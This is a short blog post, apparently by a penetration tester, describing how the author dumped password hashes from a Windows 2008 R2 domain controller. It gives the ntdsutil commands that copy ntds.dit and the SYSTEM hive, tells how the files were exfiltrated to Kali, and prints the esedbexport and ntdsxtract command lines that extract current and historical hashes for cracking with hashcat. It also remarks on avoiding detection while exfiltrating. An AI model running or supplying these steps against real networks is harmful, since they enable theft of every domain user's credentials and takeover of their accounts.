credential mining a domain controller

the target system was windows 2k8 server r2

the active directory (file ntds.dit) contains the current and historical password hashes of all domain users – a goldmine

taking a copy of the files
the relevant files (ntds.dit, and the SAM/SYSTEM registry) are locked by the OS, so you need to run a special tool to clone them

several other tools are available (e.g. vssadmin, ninjacopy, …)

i used ntdsutil because it seemed the simplest in my case

activate instance ntds
create full c:\backup

installing the utils
i elected to exfiltrate the files and process them in kali

in the case of a large domain and correspondingly large files, exfiltration without detection may present its own challenges

there are alternative methods for in-situ extraction, and even a metasploit module which will perform the attack in memory on the target and stream the results to you, but i chose this option because the domain wasn’t very big and it meant that after transferring the files i was under no time pressure; i didn’t need to worry about being kicked off while figuring stuff out

building/installing libesedb
i had problems building libesedb initially, but after cycling through re-running a few times, it just worked

if you get the error ‘Missing file remove function’, add ‘#define HAVE_UNLINK 1’ to libcfile/libcfile_support.c (i experienced this error in one build, but not in another – strange!)

apt-get install git autoconf automake autopoint libtool pkg-config build-essential
git clone
cd libesedb
make install

installing ntdsxtract
cd /opt
git clone

hash extraction
in the directory where the “Active Directory” and “registry” dirs are, which you exfiltrated:

esedbexport -m tables “Active Directory/ntds.dit”
python /opt/ntdsxtract/ ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 hashdumpwork –syshive registry/SYSTEM –lmoutfile $PWD/lm-out.txt –ntoutfile $PWD/nt-out.txt –pwdformat ocl –passwordhashes –passwordhistory | tee ntdxtract.out

note that the table names might be different. here i’m using ‘datatable.3’ but it might be ‘datatable.7’ or whatever. same deal with link_table

i had problems exporting the hashes to lm-out.txt and nt-out.txt until i fully specified the path. weird

now crack those hashes with hashcat

# references

Leave a Reply

Your email address will not be published. Required fields are marked *